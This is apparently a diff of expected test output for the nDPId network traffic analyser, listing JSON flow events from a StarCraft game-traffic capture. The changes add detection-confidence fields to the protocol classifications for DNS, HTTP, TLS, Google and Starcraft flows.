-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389964752,"flow_last_seen":1437389964835,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00626{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953643,"flow_last_seen":1437389953774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":22,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","ndpi": {"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389964752,"flow_last_seen":1437389964835,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953643,"flow_last_seen":1437389953774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":22,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953643,"flow_last_seen":1437389953774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":22,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982884,"flow_last_seen":1437389982933,"flow_idle_time":180000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.166","src_port":6113,"dst_port":1119,"l4_proto":"udp","ndpi": {"proto":"Starcraft","breed":"Fun","category":"Game"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982884,"flow_last_seen":1437389982933,"flow_idle_time":180000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.166","src_port":6113,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982884,"flow_last_seen":1437389982933,"flow_idle_time":180000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.166","src_port":6113,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982782,"flow_last_seen":1437389982833,"flow_idle_time":180000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.212","src_port":6113,"dst_port":1119,"l4_proto":"udp","ndpi": {"proto":"Starcraft","breed":"Fun","category":"Game"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982782,"flow_last_seen":1437389982833,"flow_idle_time":180000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.212","src_port":6113,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982782,"flow_last_seen":1437389982833,"flow_idle_time":180000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.212","src_port":6113,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00652{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389981197,"flow_last_seen":1437389981500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00655{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389981330,"flow_last_seen":1437389981497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":249,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00652{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389982140,"flow_last_seen":1437389982442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00651{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389982269,"flow_last_seen":1437389982443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":463,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00652{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389983663,"flow_last_seen":1437389983964,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00655{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389983788,"flow_last_seen":1437389983963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00652{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985308,"flow_last_seen":1437389985615,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":491,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00652{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985320,"flow_last_seen":1437389985635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00655{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389985434,"flow_last_seen":1437389985610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3255,"flow_avg_l4_payload_len":271,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00655{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389985446,"flow_last_seen":1437389985631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3062,"flow_avg_l4_payload_len":278,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389955670,"flow_last_seen":1437389984611,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"173.194.40.22","dst_ip":"192.168.1.100","src_port":443,"dst_port":53568,"l4_proto":"udp","ndpi": {"proto":"Google","breed":"Acceptable","category":"Web"}}
+00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389981197,"flow_last_seen":1437389981500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389981330,"flow_last_seen":1437389981497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":249,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389982140,"flow_last_seen":1437389982442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389982269,"flow_last_seen":1437389982443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":463,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389983663,"flow_last_seen":1437389983964,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389983788,"flow_last_seen":1437389983963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985308,"flow_last_seen":1437389985615,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":491,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985320,"flow_last_seen":1437389985635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389985434,"flow_last_seen":1437389985610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3255,"flow_avg_l4_payload_len":271,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389985446,"flow_last_seen":1437389985631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3062,"flow_avg_l4_payload_len":278,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389955670,"flow_last_seen":1437389984611,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"173.194.40.22","dst_ip":"192.168.1.100","src_port":443,"dst_port":53568,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389955670,"flow_last_seen":1437389984611,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"173.194.40.22","dst_ip":"192.168.1.100","src_port":443,"dst_port":53568,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982823,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"5.42.180.154","src_port":53146,"dst_port":1119,"l4_proto":"udp","ndpi": {"proto":"Starcraft","breed":"Fun","category":"Game"}}
+00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982823,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"5.42.180.154","src_port":53146,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Starcraft","breed":"Fun","category":"Game"}}
 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982823,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"5.42.180.154","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"199.38.164.156","src_port":3486,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"199.38.164.156","src_port":3486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"199.38.164.156","src_port":3486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389963466,"flow_last_seen":1437389963469,"flow_idle_time":180000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":452,"flow_tot_l4_payload_len":4522,"flow_avg_l4_payload_len":411,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00713{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1437389964790,"flow_last_seen":1437389968014,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":124502,"flow_avg_l4_payload_len":695,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4":"Binary application transfer"},"proto":"HTTP","breed":"Acceptable","category":"Download"}}
-00600{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
